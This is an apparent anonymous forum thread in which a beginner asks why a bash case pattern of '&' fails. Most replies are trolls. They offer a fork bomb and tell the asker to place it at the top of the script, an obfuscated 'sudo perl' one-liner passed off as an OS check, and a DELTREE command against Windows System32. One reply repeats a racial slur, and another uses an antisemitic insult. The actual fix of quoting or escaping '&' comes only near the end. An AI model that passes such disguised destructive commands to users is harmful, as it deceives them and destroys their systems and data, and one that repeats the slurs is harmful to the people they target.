Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

Bash?!?!

Name: Anonymous 2011-11-06 1:23

#! /bin/bash

num="&"

case "$num" in

        & )
                echo "This works"
        ;; 
esac

why doesn't this work?

Name: Anonymous 2011-11-06 1:32

Try this.

:(){:|:}:

Name: Anonymous 2011-11-06 1:36

i dont get it?

Name: Anonymous 2011-11-06 1:36

This rather.

:(){:|:&};:

ENTERPRISE QUALITY BASH SCRIPTING FOR THE NEXT SOCIAL REVOLUTION. ARE YOU READY FOR WHAT'S NEXT?

Name: Anonymous 2011-11-06 1:39

sorry im new at this ?
case "$num" in
  :(){:|:&};:
      echo "doesn't work"
????

Name: Anonymous 2011-11-06 1:41

It goes near the top, like so.


#! /bin/bash

:(){ :|:& };:

num="&"

case "$num" in

        & )
                echo "This works"
        ;; 
esac

Name: Anonymous 2011-11-06 1:42

Thanks !!!

Name: Anonymous 2011-11-06 1:43

thats not nice

Name: Anonymous 2011-11-06 1:48

well that was fun can you help me now ?

Name: Anonymous 2011-11-06 1:49

am i baned?

Name: Anonymous 2011-11-06 1:56

o you have to make it literal \& you guys suck

Name: Anonymous 2011-11-06 2:14

>>10
If there is then yes you should be IP banned for life.

Name: Anonymous 2011-11-06 2:56

>>8
<img src="coolface.jpg" />

Name: Anonymous 2011-11-06 3:12

OP, try running

sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


post results here, so we will know what your OS is.

Name: Anonymous 2011-11-06 3:46

OP, try running
C:\>DELTREE C:\WINDOWS\SYSTEM32

Name: Anonymous 2011-11-06 4:13


#!/nigger/nigger/nigger

nigger="nigger"

nigger "$nigger" nigger
    "nigger")
        nigger "nigger"
        ;;
nigger


YOU CAN THANK ME LATER

Name: Anonymous 2011-11-06 7:50

>>8
http://en.wikipedia.org/wiki/Fork_bomb
http://linux.die.net/man/5/limits.conf

>>1
http://tldp.org/LDP/abs/html/index.html

>>11
Methinks quoting would be more reliable.
& - reserved name. Don't use it if you don't mean it.
\& - works
'&', "&" - better. Kinda removes any doubt that it's a text string.

Name: Anonymous 2011-11-06 13:44

>>17
shut up, jewboy

Name: Anonymous 2011-11-06 16:37

>>18
I could have said "no u", but I'm out of trollfeed.

Don't change these.
Name: Email:
Entire Thread Thread List